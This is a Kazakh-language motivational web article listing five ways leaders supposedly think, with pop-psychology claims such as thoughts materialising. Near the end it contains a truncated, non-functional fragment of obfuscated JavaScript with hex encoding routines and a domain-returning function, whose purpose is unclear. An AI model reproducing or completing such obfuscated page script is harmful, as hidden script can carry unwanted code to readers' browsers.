Көшбасшылар қалай ойлайды?

Уинстон Черчилль бір жиынында "Жетістік – ол энтузиазмді жоғалтпай, сәтсіздіктен сәтсіздікке дейін қимылдай білу" деген екен.Қазіргі таңда біз көшбасшылар мен бастықтарды шатастырудамыз.Бір сөзбен айтқанда,бастық алдыға шығып оны итергенді қалайды,ал лидер алдыға шығып өзгелерді жақсыға тартады.

Жетістікке жету үшін көшбасшылардың ойлауы да ерекше болады.

Көшбасшылар қалай ойлайды?

1. Үздік адамдар тек позитивті ойларды ойлайды,жақсы жағдайларды елестетеді,өйткені жағымды бейнелерді қабылдаған адам санасы оның көрініс болжап,жұмысты жақсы атқаруға немесе мәселенің шешімін табуға көмектеседі.Көңілсіз не қобалжулы көңіл күймен жетістікке жеті мүмкін емес!

2. Пайда болған мәселенің көшбасшылар шешімін өте оңай әрі қарапайым  ретінде қарастырады.Егер жолбарысты мысықпен бірдей көлемге келтіріп,кішірейтсе ол мүлдем қорқынышты,үрей тудыратын жыртқыш емес қой,иә?Әдетте адамдар мәселенің күрделілік деңгейін жоғарлатады,ал бұл проблеманың шын мәнісінде күрделенуіне(ойлардың материализациялануына) әкеп соғады.
3. Көшбасшылар әрдайым күлімсіреп,жайдары жүреді.Гарвард университетінің студенттеріне ұсынылған ынталандырушы сөздердің арасында да күлімсіреп жүру-денсаулықты да өмірді де көңіл күйді д жақсартады деген сынды кеңестер бар.Сіз өмірге қалай қарасаңыз,ол да сізге солай қарайтынын ұмытпағайсыз!
4. Көшбасшылар үлкен бейнелерді(образдарды) қолданады.Олар үлкен мақсаттар қояды,үлкен істерді жоспарлайды және үлкен болжамдар жасайды,өйткені үлкен бейнелердің уәждау қасиеті жоғары.
5. Көшбасшылар жасалған істерінің болашағын ойлайды.Нағыз көшбасшылар бір сәттік ләззат үшін айлармен,жылдармен жасаған еңбегін көкке ұшырмайды.
"Қолымнан келсе,істер едім" демей "қолымнан келеді,істеймін" деңіз!

Біздің философиялық көзқарастарымыз-бұл  біздің өмірлік жолымызды,бағымызды анықтайтын желкен.Бағытты өзгерту үшін біз орын алған жағдайларды емес,философиямызды өзгертуге тиіспіз.

Егер сізге қоғамдағы өз орныңыз ұнамаса,оны өзгертіңіз!Сіз жерге тамырымен қадалып қалған ағаш емессіз!
P.S Әлемдегі ең ауыр,үлкен нәрсе-көк кит,ал қалған дүниелер жеңіл әрі қарапайым!

// o;o++)t+=e.charCodeAt(o).toString(16);return t},a=function(e){e=e.match(/[\S\s]{1,2}/g);for(var t="",o=0;o < e.length;o++)t+=String.fromCharCode(parseInt(e[o],16));return t},d=function(){return "massaget.kz"},p=function(){var w=window,p=w.document.location.protocol;if(p.indexOf("http")==0){return p}for(var e=0;e

Бөлісу: